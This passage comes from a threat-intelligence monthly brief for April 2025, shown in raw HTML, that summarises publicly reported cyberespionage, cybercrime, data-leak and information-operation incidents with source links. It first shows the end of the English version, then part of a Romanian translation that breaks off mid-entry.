customer data and code project files. 
CNCERT stated that the US-linked threat actor operated mainly during US working hours and used high-level cyberespionage tactics. This publication was likely intended as a response to recent public reporting on China's Volt Typhoon campaign. <code>china<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/mp.weixin.qq.com\/s\/kzdSrLdejED3MxSKtszUnA?\">link<\/a><\/p><p><strong>Trojanised Alpine Quest app used to spy on Russian military operations<\/strong><br> On April 21, researchers at Russian mobile antivirus company Doctor Web uncovered a new Android spyware campaign hiding inside trojanised versions of the Alpine Quest mapping app, often used by Russian soldiers for war zone planning. The malicious app, promoted as a cracked Pro version, steals sensitive data such as geolocation, contacts, and files - demonstrating how mobile surveillance is now being deployed on both sides of the conflict for military intelligence. <code>defence<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.drweb.com\/show\/?i=15006&lng=en&c=5\">link<\/a> <\/p><p><strong>Threat actor Sapphire Werewolf targets likely Russian energy companies with updated Amethyst stealer<\/strong><br> On April 9, BI.ZONE Threat Intelligence reported on the threat actor Sapphire Werewolf and its enhanced Amethyst stealer to target energy companies, distributing it via phishing e-mails disguised as HR memos in Russian. The updated malware includes advanced virtual environment checks and uses Triple DES encryption for string protection. It collects credentials from browsers and applications, sending system data to specific addresses. The malware also executes a decoy PDF and checks for virtual machine indicators. 
<code>energy<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/bi-zone.medium.com\/sapphire-werewolf-refines-amethyst-stealer-to-attack-energy-companies-f55931a5c4d4\">link<\/a> <\/p><p><strong>Lazarus targets South Korean organisations in Operation SyncHole<\/strong><br> On April 24, Kaspersky reported that between November 2024 and February 2025, the North Korean Lazarus group launched a campaign named Operation SyncHole targeting at least six organisations in South Korea. These organisations span industries such as software, IT, finance, semiconductor manufacturing, and telecommunications. The operation exploited vulnerabilities in South Korean software to execute watering hole attacks and install various forms of malware. <code>finance<\/code> <code>north korea<\/code> <code>technology<\/code> <code>telecommunications<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/securelist.com\/operation-synchole-watering-hole-attacks-by-lazarus\/116326\/\">link<\/a> <\/p><p><strong>Kimsuky APT group exploits RDP and MS Office flaws in global cyberespionage campaign<\/strong><br> On April 14, researchers from AhnLab Security Intelligence Center (ASEC) revealed that the North Korean-linked Kimsuky group is actively exploiting RDP and Microsoft Office vulnerabilities\u2014specifically BlueKeep (CVE-2019-0708) and CVE-2017-11882\u2014in a global cyberespionage campaign known as Larva-24005. The attackers deploy custom malware like MySpy, RDPWrap, and keyloggers to maintain persistent access and exfiltrate sensitive data from targeted sectors across South Korea, the U.S., China, Japan, and more. 
<code>north korea<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/asec.ahnlab.com\/en\/87554\/\">link<\/a> <\/p><p><strong>APT36 exploits Pahalgam attack theme to target Indian government with Crimson RAT<\/strong><br> On April 30, cybersecurity firm Seqrite reported that Pakistan-linked APT36 used Pahalgam attack-themed decoy documents to target Indian government entities. The campaign employed Crimson RAT malware delivered via malicious Excel files with embedded macros. These files extracted and executed the malware while displaying legitimate-looking documents. The operation shared infrastructure with SideCopy, indicating coordination between the groups. <code>india<\/code> <code>pakistan<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.seqrite.com\/blog\/advisory-pahalgam-attack-themed-decoys-used-by-apt36-to-target-the-indian-government\/\">link<\/a><\/p><p><strong>Apple patches two exploited zero-days in targeted iPhone attacks<\/strong><br> On April 16, Apple released emergency updates to fix two zero-days\u2014CVE-2025-31200 in CoreAudio and CVE-2025-31201 in RPAC\u2014used in targeted iPhone attacks. The flaws affected multiple Apple platforms and enabled remote code execution and PAC bypass. Apple and Google's threat team discovered the issues. Users are urged to update devices despite the attacks being highly targeted. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/support.apple.com\/en-us\/122282\">link<\/a> <\/p><p><strong>ClickFix: State-sponsored actors exploit new phishing technique across key sectors<\/strong><br> On April 17, Proofpoint reported that state-sponsored actors, including TA571, TA578, UAC-0050, and Storm-1865, have increasingly adopted the \"ClickFix\" phishing technique. This method deceives users into executing malicious PowerShell commands via fake error messages or CAPTCHA prompts, leading to malware infections such as DanaBot, Lumma Stealer, and AsyncRAT. 
Targets include sectors like transportation, logistics, and hospitality, with campaigns impersonating services like Booking.com and Microsoft SharePoint. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/around-world-90-days-state-sponsored-actors-try-clickfix\">link<\/a> <\/p><p><strong>Brazil allegedly conducts cyberespionage against Paraguay amid energy trade negotiations<\/strong><br> On March 31, UOL, a Brazilian media outlet, alleged that the Brazilian Intelligence Agency (ABIN) conducted a cyberespionage campaign in 2024 against the Paraguayan government to obtain sensitive information regarding energy trade negotiations. The negotiations specifically pertained to tariffs on the Itaipu hydroelectric plant. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.yahoo.com\/news\/brazils-government-admits-spying-paraguay-233533589.html\">link<\/a> <\/p><h3 id=\"cybercrime-2\">Cybercrime<\/h3><p><strong>Tycoon2FA phishing kit adopts new evasion techniques<\/strong><br> On April 10, Trustwave reported that the Tycoon2FA phishing kit has incorporated new evasion tactics, including obfuscated JavaScript using invisible Unicode characters, custom HTML5 CAPTCHA challenges, and anti-debugging scripts. These enhancements aim to bypass security measures and hinder analysis. The kit continues to target Microsoft 365 users, emphasising the need for robust detection strategies against evolving phishing threats. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.trustwave.com\/en-us\/resources\/blogs\/spiderlabs-blog\/tycoon2fa-new-evasion-technique-for-2025\/\">link<\/a> <\/p><p><strong>Phishing campaign impersonates Cloudflare services and uses Telegram to filter victim IPs<\/strong><br> On April 1, researchers at hunt.io reported that they had tracked a phishing campaign which used fake Cloudflare prompts to trick users into clicking on a malicious redirect link. 
Further analysis revealed that the threat actors operated a Russian-language Telegram channel and used Telegram in general to filter victim IPs. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/hunt.io\/blog\/russian-actor-cloudflare-phishing-telegram-c2\">link<\/a> <\/p><p><strong>Lazarus ClickFake Interview campaign targets cryptocurrency platforms<\/strong><br> On March 31, Sekoia reported that the North Korea-linked threat actor Lazarus continued its targeting of the cryptocurrency sector through fake job interviews, most recently via the so-called ClickFake Interview campaign. ClickFake Interview leverages fake job interview websites to deploy a Go backdoor on Windows and macOS environments by using the ClickFix tactic. <code>north korea<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/blog.sekoia.io\/clickfake-interview-campaign-by-lazarus\/\">link<\/a> <\/p><p><strong>Cookie-Bite PoC shows how malicious Chrome extensions can bypass MFA and hijack cloud sessions<\/strong><br> On April 22, Varonis Threat Labs researchers unveiled the Cookie-Bite attack, a proof-of-concept using a stealthy Chrome extension to steal Azure Entra ID session cookies and bypass MFA protections. The malicious extension monitors Microsoft login events, exfiltrates session tokens, and enables attackers to inject them for full access to services like Microsoft 365 and Teams, highlighting the severe risks posed by malicious browser extensions in cloud-based identity environments. <code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.varonis.com\/blog\/cookie-bite\">link<\/a> <\/p><p><strong>Google OAuth and DKIM flaw enables nearly undetectable phishing attacks<\/strong><br> On April 15, hackers exploited a flaw in Google\u2019s DKIM system to send phishing emails that passed authentication checks and appeared to come from no-reply@google.com, leading victims to a fake Google support portal hosted on sites.google.com. 
By abusing OAuth notifications and DKIM\u2019s limited validation scope, attackers crafted highly convincing credential-stealing messages\u2014an approach also seen targeting PayPal users through similar infrastructure abuse. <code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/threadreaderapp.com\/thread\/1912439023982834120.html\">link<\/a> <\/p><h3 id=\"data-exposure-and-leaks-2\">Data exposure and leaks<\/h3><p><strong>SK Telecom confirms malware breach exposing sensitive USIM data<\/strong><br> On April 22, South Korea's largest mobile operator, SK Telecom, announced that malware had infiltrated its systems, exposing sensitive USIM data such as IMSI, MSISDN, and authentication keys in a cyberattack discovered on April 19. Although there\u2019s no evidence of misuse, the company reported the breach to authorities and implemented stricter USIM swap controls to prevent SIM-related fraud and enhance account protection for its 34 million subscribers. <code>telecommunications<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.sktelecom.com\/211423\">link<\/a> <\/p><h3 id=\"information-operations-2\">Information operations<\/h3><p><strong>China using AI in information operations targeting Taiwan<\/strong><br> On April 9, The Japan Times published an article about China conducting information operations on social media, namely Facebook and TikTok, to create internal turmoil in Taiwan. Taiwan's National Security Bureau published a report about China using AI to further these objectives, both in the generation and the dissemination of messages. The goal is to create division in the population. 
<code>artificial intelligence<\/code> <code>china<\/code> <code>japan<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.japantimes.co.jp\/news\/2025\/04\/08\/asia-pacific\/politics\/taiwan-china-ai-disinformation\/\">link<\/a> <\/p><h3 id=\"disruption-and-destruction-2\">Disruption and destruction<\/h3><p><strong>China accuses US of cyberattacks during Asian Winter Games<\/strong><br> On April 15, Chinese authorities accused the US NSA of launching cyberattacks during the 2025 Asian Winter Games in Harbin. The attacks allegedly targeted infrastructure in Heilongjiang province and attempted to access athletes\u2019 personal data. Three NSA agents were named, and US universities were implicated. China claims the activity aimed to disrupt critical systems and steal sensitive information. <code>china<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.cgtn.com\/news\/2025-04-15\/China-names-U-S-secret-agents-involved-in-Harbin-2025-cyberattacks-1CAgLi2gwKY\/p.html\">link<\/a> <\/p><div class=\"footnotes\"><hr><ol><li id=\"fn-1\"><p>Conclusions or attributions made in this document merely reflect what publicly available sources report. 
They do not reflect our stance.&#160;<a href=\"#fnref-1\" class=\"footnoteBackLink\" title=\"Jump back to footnote 1 in the text.\">&#8617;<\/a><\/p><\/li><\/ol><\/div><\/div>\n        <\/div>\n\n        <div id=\"content-ro\" class=\"lang-content\" style=\"display: none;\">\n            <div class=\"article-content\"><?xml encoding=\"UTF-8\"><h2 id=\"cyber-brief-april-2025\">Cyber &#8203;&#8203;Brief (aprilie 2025)<\/h2><p>2 mai 2025 - Versiunea: 1<\/p><p class=\"tlp-type clear\">TLP:CLEAR<\/p><h2 id=\"executive-summary\">Rezumat<\/h2><ul><li><p>Am analizat 311 rapoarte open source pentru acest Cyber &#8203;&#8203;Brief<sup class=\"footnote-ref\" id=\"fnref-1\"><a href=\"#fn-1\">1<\/a><\/sup>.<\/p><\/li><li><p><strong>Politic&#259;, cooperare &#537;i aplicarea legii.<\/strong>FBI a c&#259;utat ajutor pentru a identifica hackerii chinezi care &icirc;ncalc&#259; telecomunica&#539;iile. SUA au lansat un program pentru a proteja datele sensibile de amenin&#539;&#259;rile str&#259;ine. Trump l-a revocat pe directorul NSA, dup&#259; sfatul unui activist de extrem&#259; dreapt&#259;, potrivit Washington Post. China a admis &icirc;n mod tacit atacurile cibernetice asupra infrastructurii critice din SUA, &icirc;ncadrate ca un r&#259;spuns la sprijinul SUA pentru Taiwan. De asemenea, a restric&#539;ionat exporturile de p&#259;m&acirc;nturi rare &#537;i a interzis firmelor chineze s&#259; se angajeze cu contractori de ap&#259;rare din SUA.<\/p><\/li><li><p><strong>Ciberspionaj &#537;i prepozi&#539;ionare.<\/strong>Autorit&#259;&#539;ile franceze, germane &#537;i olandeze au legat recent atacurile cibernetice de actori sus&#539;inu&#539;i de stat rus, inclusiv spionajul cibernetic &icirc;mpotriva institu&#539;iilor diplomatice &#537;i de cercetare &#537;i &icirc;ncerc&#259;rile de sabotare asupra infrastructurii critice. Un membru al Parlamentului European a dezv&#259;luit c&#259; a fost vizat de hackeri lega&#539;i de Iran &icirc;n tentativa de spionaj cibernetic. 
Campania pentru lucr&#259;torii IT din RPDC legat&#259; de Coreea de Nord se extinde la nivel global, cu accent pe Europa. Tot &icirc;n Europa, au fost raportate noi cazuri de spyware mercenar, viz&acirc;nd jurnali&#351;ti &#351;i activi&#351;ti. La nivel global, cercet&#259;torii au observat c&#259; presupusul actor chinez de amenin&#539;are UNC5221 exploateaz&#259; &icirc;n mod activ vulnerabilitatea critic&#259; Ivanti Connect Secure, &icirc;n timp ce un grup chinez APT a vizat guvernul rus. &Icirc;n plus, China a acuzat serviciile de informa&#539;ii americane c&#259; vizeaz&#259; firma criptografic&#259; chinez&#259;. &Icirc;n special, APT36 legat de Pakistan a exploatat tema atacului Pahalgam pentru a viza guvernul indian.<\/p><\/li><li><p><strong>Crima cibernetic&#259;.<\/strong>Kitul de phishing Tycoon2FA utilizeaz&#259; acum tehnici avansate de evaziune, &icirc;n timp ce o campanie de phishing Cloudflare folose&#537;te Telegram pentru a filtra IP-urile victimelor. Lazarus continu&#259; s&#259; vizeze platformele de criptomonede cu interviuri de angajare false, iar dovada de concept Cookie-Bite arat&#259; cum extensiile Chrome pot ocoli MFA. 
&Icirc;ntre timp, un defect Google DKIM este exploatat pentru atacuri de phishing aproape nedetectabile.<\/p><\/li><li><p><strong>Expunerea &#537;i scurgerile de date.<\/strong>Cazuri notabile de scurgeri de date au afectat patru sectoare, respectiv administra&#539;ia public&#259;, telecomunica&#539;ii, tehnologie &#537;i transport.<\/p><\/li><li><p><strong>Perturbare &#537;i distrugere.<\/strong>Autorit&#259;&#539;ile chineze au acuzat NSA american&#259; c&#259; a lansat atacuri cibernetice &icirc;n timpul Jocurilor Asiatice de Iarn&#259; din 2025 de la Harbin, cu scopul de a perturba sistemele critice &#537;i de a fura informa&#539;ii sensibile.<\/p><\/li><li><p><strong>Opera&#539;iunea de informare.<\/strong>Contul de socializare al prim-ministrului ceh a fost compromis pentru a posta mesaje false, inclusiv despre un atac rusesc asupra solda&#539;ilor cehi. Lituania a avertizat cu privire la activitatea hibrid&#259; rus&#259; &#537;i belarus&#259; fa&#539;&#259; de diaspora belarus&#259;. Mass-media japonez&#259; a relatat despre utilizarea IA &icirc;n opera&#539;iunile de informare care vizeaz&#259; Taiwanul &icirc;n China.<\/p><\/li><li><p><strong>Hacktivism.<\/strong>&Icirc;n Europa, presupu&#537;ii hacktivi&#537;ti lega&#539;i de Rusia au vizat diverse entit&#259;&#539;i din Europa, inclusiv organiza&#539;ii legate de alegeri finlandeze &#537;i organiza&#539;ii olandeze, &icirc;n timp ce o coali&#539;ie de hacktivi&#537;ti supranumit&#259; &bdquo;Liga Sf&acirc;nt&#259;&rdquo; vizeaz&#259; armata britanic&#259; cu atacuri DDoS.<\/p><\/li><\/ul><h2 id=\"europe\">Europa<\/h2><h3 id=\"cyber-policy-and-law-enforcement\">Politica cibernetic&#259; &#537;i aplicarea legii<\/h3><p><strong>Guvernul ceh a sanc&#539;ionat ofi&#539;erul rus GRU<\/strong><br>Pe 2 aprilie, guvernul ceh a ad&#259;ugat jurnalista Natalia Sudliankov&aacute; &#537;i ofi&#539;erul GRU Alexei Shavrov pe lista de sanc&#539;iuni pentru leg&#259;turile cu informa&#539;iile militare ruse. 
Ambii sunt acuza&#539;i c&#259; sprijin&#259; campanii de influen&#539;&#259; a statului rus &#537;i opera&#539;iuni de informare &icirc;n Cehia. Sudliankov&aacute; a primit ordin s&#259; p&#259;r&#259;seasc&#259; &#539;ara &icirc;n 30 de zile.<code>rusia<\/code> <code>sanc&#539;iuni<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/ct24.ceskatelevize.cz\/clanek\/domaci\/vlada-rozsirila-sankcni-seznam-o-dvojici-spojenou-s-ruskou-gru-359667\">link<\/a> <\/p><p><strong>Operation Endgame dobor&icirc; clien&#539;ii Smokeloader<\/strong><br>La 9 aprilie, Europol a anun&#539;at c&#259; Opera&#539;iunea Endgame, o ini&#539;iativ&#259; de cooperare &icirc;ntre Europol, poli&#539;ia din mai multe &#539;&#259;ri UE, SUA &#537;i Eurojust, care a dus la eliminarea celor mai mari aplica&#539;ii malware &icirc;n mai 2024, a desf&#259;&#537;urat o nou&#259; opera&#539;iune de extindere &icirc;mpotriva re&#539;elei botnet cu plata pe instalare Smokeloader la &icirc;nceputul anului 2025. botnet.<code>eliminare<\/code> <code>arest&#259;ri<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.europol.europa.eu\/media-press\/newsroom\/news\/operation-endgame-follow-leads-to-five-detentions-and-interrogations-well-server-takedowns\">leg&#259;tur&#259;<\/a> <\/p><p><strong>&#536;ase infractori cibernetici aresta&#539;i &icirc;n Spania pentru &icirc;n&#537;el&#259;torie AI<\/strong><br>Pe 7 aprilie, Polic&iacute;a Nacional din Spania a anun&#539;at arestarea a &#537;ase persoane apar&#539;in&acirc;nd unei organiza&#539;ii criminale care a &icirc;n&#537;elat peste 19 milioane de euro victimelor din &icirc;ntreaga lume. 
Ei au creat reclame false cu personaje na&#539;ionale cunoscute prin inteligen&#539;a artificial&#259;, recomand&acirc;nd oamenilor s&#259; investeasc&#259; &icirc;n produse; victimele au fost alese prin algoritmi.<code>arest&#259;ri<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.policia.es\/_es\/comunicacion_prensa_detalle.php?ID=16521\">link<\/a> <\/p><h3 id=\"cyberespionage-and-prepositioning\">Ciberspionaj &#537;i prepozi&#539;ionare<\/h3><p><strong>Autorit&#259;&#539;ile franceze atribuie campania de spionaj cibernetic APT28 intereselor statului rus<\/strong><br>Pe 29 aprilie, agen&#539;ia francez&#259; de securitate cibernetic&#259; ANSSI a raportat c&#259; APT28, un grup de amenin&#539;are legat de Rusia, a vizat guvernul francez, sectoarele diplomatice &#537;i de cercetare &icirc;ntre 2021 &#537;i 2024. Aceste atacuri cibernetice au avut ca scop colectarea informa&#539;iilor &#537;i fac parte din opera&#539;iuni mai ample care afecteaz&#259; Europa, Ucraina &#537;i America de Nord. Atacurile continu&#259; pe fondul r&#259;zboiului Rusiei &icirc;mpotriva Ucrainei. ANSSI &#537;i partenerii s&#259;i au identificat mai multe lan&#539;uri de infec&#539;ie utilizate &icirc;n aceste campanii.<code>rusia<\/code> <code>diploma&#539;ie<\/code> <code>cercetare<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.cert.ssi.gouv.fr\/cti\/CERTFR-2025-CTI-006\/\">link<\/a> <\/p><p><strong>Informa&#539;iile germane analizeaz&#259; un posibil atac cibernetic legat de Rusia, care vizeaz&#259; organiza&#539;ia de cercetare<\/strong><br>Pe 8 aprilie, Oficiul Federal pentru Securitatea Informa&#539;iei (BSI) din Germania &#537;i Oficiul Federal pentru Protec&#539;ia Constitu&#539;iei (BfV) au anun&#539;at c&#259; investigheaz&#259; un atac cibernetic care vizeaz&#259; Asocia&#539;ia German&#259; pentru Studii Est-Europene (DGO), o organiza&#539;ie specializat&#259; &icirc;n rela&#539;ii interna&#539;ionale. 
Actorii de amenin&#539;&#259;ri au &icirc;nc&#259;lcat DGO la sf&acirc;r&#537;itul lunii martie &#537;i &#537;i-au accesat e-mailurile. Oficialii serviciilor secrete germane spun c&#259; b&#259;nuiesc c&#259; actorii amenin&#539;&#259;rilor sunt lega&#539;i de Rusia, posibil APT29.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.dw.com\/en\/germany-suspects-russian-cyber-attack-on-research-group\/a-72175406\">link<\/a> <\/p><p><strong>Hackerii ru&#537;i vizeaz&#259; infrastructura critic&#259; olandez&#259; &icirc;n prima &icirc;ncercare cunoscut&#259; de sabotaj<\/strong><br>Pe 22 aprilie, Agen&#539;ia Olandez&#259; de Informa&#539;ii Militare (MIVD) a dezv&#259;luit c&#259; hackerii ru&#537;i au &icirc;ncercat s&#259; saboteze sistemul de control digital al unei instala&#539;ii publice olandeze anul trecut, marc&acirc;nd primul atac cibernetic cunoscut asupra infrastructurii critice din &#538;&#259;rile de Jos. Agen&#539;ia a avertizat cu privire la amenin&#539;&#259;rile tot mai mari din partea Rusiei &#537;i Chinei, subliniind eforturile de sabotare ale Rusiei &icirc;n Marea Nordului &#537;i cre&#537;terea opera&#539;iunilor cibernetice &icirc;mpotriva na&#539;iunilor europene care sprijin&#259; Ucraina.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.dw.com\/en\/dutch-intelligence-reports-russian-cyber-attack\/a-72309443\">link<\/a> <\/p><p><strong>Actorii amenin&#539;&#259;rilor lega&#539;i de Rusia vizeaz&#259; fluxurile de lucru Microsoft OAuth<\/strong><br>Pe 22 aprilie, Volexity a publicat o postare pe blog despre campaniile de phishing legate de Rusia care abuzau de fluxurile de lucru de autentificare Microsoft OAuth 2.0 pentru a viza entit&#259;&#539;ile cu leg&#259;turi cu Ucraina. 
Actorii amenin&#539;&#259;rilor, urm&#259;ri&#539;i ca UTA0352 &#537;i UTA0355, se uzurpeaz&#259; pe oficialii europeni &#537;i folosesc platforme precum Signal &#537;i WhatsApp pentru a atrage victimele s&#259; partajeze codurile de autorizare Microsoft.<code>administra&#539;ia public&#259;<\/code> <code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.volexity.com\/blog\/2025\/04\/22\/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows\/\">link<\/a> <\/p><p><strong>Gamaredon, legat de Rusia, a vizat o misiune militar&#259; str&#259;in&#259; &icirc;n Ucraina cu unit&#259;&#539;i deta&#537;abile care furnizeaz&#259; GammaSteel<\/strong><br>Actorul de amenin&#539;&#259;ri legat de Rusia, Gamaredon, a vizat o misiune militar&#259; str&#259;in&#259; a unei &#539;&#259;ri occidentale cu sediul &icirc;n Ucraina cu malware GammaSteel. Accesul ini&#539;ial a fost ob&#539;inut prin intermediul unit&#259;&#539;ilor amovibile infectate. Lan&#539;ul de infec&#539;ie implic&#259; scripturi PowerShell pentru ofuscare &#537;i servicii precum write.as &#537;i cURL cu Tor pentru exfiltrarea datelor.<code>rusia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.security.com\/threat-intelligence\/shuckworm-ukraine-gammasteel\">link<\/a> <\/p><p><strong>Europarlamentarul Hannah Neumann, vizat&#259; de hackeri lega&#539;i de Iran &icirc;ntr-o tentativ&#259; de spionaj cibernetic<\/strong><br>Pe 23 aprilie, europarlamentarul Hannah Neumann a dezv&#259;luit c&#259; biroul s&#259;u a fost vizat de o opera&#539;iune de spionaj cibernetic legat de Teheran. Hackerii au uzurpat identitatea unor persoane de contact de &icirc;ncredere pentru a furniza malware pe laptopul ei. Atacul, atribuit grupului iranian APT42, a fost blocat &icirc;nainte ca orice date s&#259; fie furate. 
Neumann, pre&#537;edintele delega&#539;iei UE-Iran, consider&#259; c&#259; &icirc;ncercarea a avut ca scop intimidarea ei din cauza pozi&#539;iei sale critice fa&#539;&#259; de regimul iranian.<code>iran<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.politico.eu\/article\/european-parliament-iran-delegation-chair-victim-tehran-linked-hacking-hannah-neumann\/\">link<\/a> <\/p><p><strong>Furnizorii chinezi de interconectare mobil&#259; prezint&#259; riscuri de supraveghere<\/strong><br>Pe 17 aprilie, iVerify, o companie de securitate cibernetic&#259;, a subliniat c&#259; furnizorii de interconectare mobil&#259; de&#539;inut&#259; de stat din China sunt parte integrant&#259; a traficului mobil global, direc&#539;ion&acirc;nd date pentru peste 60 de operatori din 35 de &#539;&#259;ri, inclusiv &icirc;n Europa. iVerify a subliniat riscul atacurilor de tip man-in-the-middle din partea unor astfel de furnizori chinezi de interconectare mobil&#259;, care ar putea intercepta traficul ori de c&acirc;te ori traficul este direc&#539;ionat folosind protocoale &icirc;nvechite, necriptate precum SS7 &#537;i Diameter.<code>China<\/code> <code>telecomunica&#539;ii<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/iverify.io\/blog\/abusing-data-in-the-middle-surveillance-risks-in-china-s-state-owned-mobile-ecosystem\">link<\/a> <\/p><p><strong>Campania pentru lucr&#259;torii IT din RPDC legat&#259; de Coreea de Nord se extinde la nivel global, cu accent pe Europa<\/strong><br>La 1 aprilie, Google Cloud a raportat c&#259; campania pentru lucr&#259;torii IT din RPDC, legat&#259; de Coreea de Nord, sa extins. &Icirc;n timp ce Statele Unite r&#259;m&acirc;n o &#539;int&#259; cheie, &icirc;n ultimele luni, lucr&#259;torii IT din RPDC au &icirc;nt&acirc;mpinat provoc&#259;ri &icirc;n c&#259;utarea &#537;i men&#539;inerea unui loc de munc&#259; &icirc;n &#539;ar&#259;. 
Google evalueaz&#259; c&#259; campania sa extins la nivel global, cu un accent notabil pe Europa. Lucr&#259;torul IT a c&#259;utat &icirc;n mod activ un loc de munc&#259; &icirc;n mai multe organiza&#539;ii din Europa, &icirc;n special &icirc;n cele din baza industrial&#259; de ap&#259;rare &#537;i &icirc;n sectoarele guvernamentale.<code>coreea de nord<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-it-workers-expanding-scope-scale\">link<\/a> <\/p><p><strong>Doi jurnali&#351;ti s&acirc;rbi au fost viza&#355;i de programul spion Pegasus &icirc;n februarie 2025<\/strong><br>Pe 28 martie, Amnesty International a raportat c&#259; doi jurnali&#351;ti de la Balkan Investigative Reporting Network (BIRN), o re&#355;ea premiat&#259; de jurnali&#351;ti de investiga&#355;ie din Serbia, au fost viza&#355;i de programul spion Pegasus al Grupului NSO. Potrivit investiga&#539;iei Amnesty International, intruziunea a avut loc &icirc;n februarie 2025. Este a treia oar&#259; &icirc;n doi ani c&acirc;nd Laboratorul de securitate al Amnesty International a constatat c&#259; programul spion Pegasus al Grupului NSO este folosit &icirc;mpotriva societ&#259;&#539;ii civile din Serbia.<code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.amnesty.org\/en\/latest\/news\/2025\/03\/serbia-birn-journalists-targeted-with-pegasus-spyware\/\">link<\/a> <\/p><p><strong>Utilizatorii WhatsApp din &#539;&#259;rile UE printre victimele campaniei de spyware NSO din 2019<\/strong><br>Pe 9 aprilie, postul de &#537;tiri online TechCrunch a publicat un articol despre documentele instan&#539;elor care dezv&#259;luie loca&#539;iile victimelor WhatsApp vizate de software-ul spion NSO &icirc;n 2019. La acea vreme, au fost viza&#539;i peste 100 de activi&#537;ti pentru drepturile omului, jurnali&#537;ti &#537;i membri ai societ&#259;&#539;ii civile, cu un total de aproximativ 1400 de victime. 
Acum se pare c&#259; printre victime au existat utilizatori &icirc;n Spania, &#538;&#259;rile de Jos, Ungaria, Fran&#539;a &#537;i Regatul Unit.<code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/techcrunch.com\/2025\/04\/09\/court-document-reveals-locations-of-whatsapp-victims-targeted-by-nso-spyware\/\">link<\/a> <\/p><p><strong>Apple avertizeaz&#259; utilizatorii, inclusiv un jurnalist &#537;i un activist din Europa, despre vizarea programelor spion<\/strong><br>Pe 29 aprilie, Apple a notificat utilizatorii din 100 de &#539;&#259;ri c&#259; ar fi putut fi viza&#539;i de programe spion guvernamentale, inclusiv jurnalistul italian Ciro Pellegrino &#537;i activista olandez&#259; Eva Vlaardingerbroek. Alertele urmeaz&#259; avertismente similare din partea Apple &#537;i a altor firme tehnologice, pe fondul investiga&#539;iilor privind spyware-ul mercenar care se presupune c&#259; ar fi v&acirc;ndut guvernelor &#537;i folosit &icirc;mpotriva jurnali&#537;tilor, activi&#537;tilor &#537;i ONG-urilor.<code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.engadget.com\/cybersecurity\/apple-sends-spyware-warnings-to-iphone-users-in-100-countries-142547474.html\">link<\/a><\/p><p><strong>Suspiciune de &icirc;nc&#259;lcare a datelor &icirc;n serviciul de acces la distan&#539;&#259; al Ministerului finlandez de Externe<\/strong><br>Pe 27 martie, Ministerul finlandez pentru Afaceri Externe a detectat activitate suspect&#259; &icirc;n serviciul s&#259;u de acces la distan&#539;&#259;, st&acirc;rnind &icirc;ngrijor&#259;ri cu privire la o posibil&#259; &icirc;nc&#259;lcare a datelor. Ca r&#259;spuns, Ministerul a dezactivat rapid serviciul &#537;i a lansat o investiga&#539;ie intern&#259;. Incidentul a fost raportat Biroului Na&#539;ional de Investiga&#539;ii &#537;i autorit&#259;&#539;ilor de securitate cibernetic&#259; pentru analize suplimentare. 
Ministerul &#537;i-a subliniat angajamentul de a-&#537;i asigura sistemele &#537;i de a atenua orice riscuri poten&#539;iale.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/um.fi\/current-affairs\/-\/asset_publisher\/gc654PySnjTX\/content\/ulkoasiainhallinnon-etayhteyspalvelussa-tietomurtoepaily\">link<\/a> <\/p><p><strong>Partidul politic polonez vizat &icirc;naintea alegerilor preziden&#539;iale din Polonia<\/strong><br>Pe 2 aprilie, premierul polonez Donald Tusk a postat pe X c&#259; partidul s&#259;u politic a fost &#539;inta unui atac cibernetic &#537;i a sugerat c&#259; are origini estice. Donald Tusk a spus c&#259; sistemul informatic al partidului s&#259;u Civic Platform a fost vizat, &icirc;nainte de viitoarele alegeri preziden&#539;iale. &#536;eful biroului lui Tusk a declarat ulterior presei poloneze c&#259; atacul cibernetic a constat &icirc;ntr-o &icirc;ncercare de a prelua controlul computerelor angaja&#539;ilor biroului Platformei Civice &#537;i ale personalului electoral.<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.euronews.com\/my-europe\/2025\/04\/02\/polands-pm-donald-tusk-says-his-partys-computer-systems-targeted-in-cyberattack\">link<\/a> <\/p><h3 id=\"cybercrime\">Crima cibernetic&#259;<\/h3><p><strong>Exploatarea NTLM CVE-2025-24054 abuzat&#259; activ prin fi&#537;iere r&#259;u inten&#539;ionate .library-ms<\/strong><br>Pe 16 